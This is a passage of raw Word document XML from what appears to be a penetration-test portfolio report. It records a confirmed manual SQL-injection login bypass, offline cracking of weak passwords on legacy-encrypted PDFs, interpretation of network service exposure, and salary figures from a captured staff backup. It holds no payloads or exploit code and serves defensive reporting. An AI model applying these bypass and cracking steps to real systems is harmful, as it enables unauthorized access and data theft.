        <w:t>14. SQL Injection Validation Decision Record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A useful professional record should explain not only what succeeded, but also what did not. This prevents tool output from being selectively interpreted and shows how the final conclusion was reached.</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Validation step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Interpretation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Normal invalid login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 200, no redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Baseline established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Controlled SQL syntax mutation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 302 to portal.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manual authentication bypass confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Browser follow-up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authenticated portal displayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>State change corroborated visually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Burp capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>302 response with Location header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Independent request/response evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Repeated 403/connection failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inconclusive automated validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Final determination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Confirmed manual SQLi/auth bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manual evidence is authoritative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This decision record is important because a negative automated result does not invalidate a reproducible manual exploit when the automated tool was prevented from receiving stable application responses. At the same time, the report does not claim that sqlmap confirmed the flaw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>What would constitute a false positive here?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A redirect that occurred for both baseline and malicious requests would not prove authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A portal page that was publicly accessible without a session would not prove a login bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A 302 response without browser confirmation would be weaker evidence because the destination might still enforce authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A scanner-only result without a reproducible request/response pair would not meet the evidence standard used in this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>15. Cryptographic Analysis — What V=2 / R=3 Means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The PDF artifacts reported version 1.4 and Standard security-handler parameters V=2 and R=3 with 128-bit encryption. These values identify a legacy PDF encryption profile. The assessment does not claim that every document using these parameters is instantly breakable; the observed practical weakness came from the combination of retrievable files, recoverable passwords and the authorized offline cracking workflow.</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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security implication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF 1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Older document format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Password-based protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legacy encryption configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legacy revision associated with 128-bit RC4/AES-era PDF security handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Key length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>128-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cryptographic parameter recorded from qpdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Password quality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>123456 / password / !@#$%^&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Weak secrets defeated offline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Application access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Files returned after auth bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary control failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why offline cracking changes the threat model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An online login attempt is constrained by server-side controls such as rate limiting, lockout and monitoring. Once an encrypted file is downloaded, password guesses can be made offline without generating additional application requests. That is why document passwords must be strong enough to resist offline guessing and why the application must prevent unauthorized file retrieval in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>16. Network Exposure Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The service scan revealed FTP, SMTP, DNS, POP3/IMAP and cPanel-related services in addition to the web application. A professional report should distinguish “reachable” from “vulnerable.” Reachability establishes attack surface; it does not by itself prove exploitation or misconfiguration.</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Observation class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>What it proves</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>What it does not prove</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Open port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A network service answered the scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>That the service is vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Service fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A protocol/software identity was inferred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>That a known CVE is exploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Direct-IP 403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Routing differs from hostname path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>That host routing is insecure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shared-hosting identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Infrastructure appears multi-tenant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>That another tenant is reachable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This distinction is particularly important for portfolio work: overclaiming a network-service vulnerability weakens credibility. The report therefore records auxiliary services as attack surface and reserves vulnerability classifications for conditions that were actually demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>17. Data Exposure Quantification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Quantification converts a generic “data leak” statement into a measurable security impact. The captured backup contains 30 staff records and 10 shareholder records. The staff salary field totals ZAR 2,027,000 per month across the 30 records, with a minimum of ZAR 19,000, a maximum of ZAR 160,000 and an average of ZAR 67,566.67.</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Data class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed quantity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Why it matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
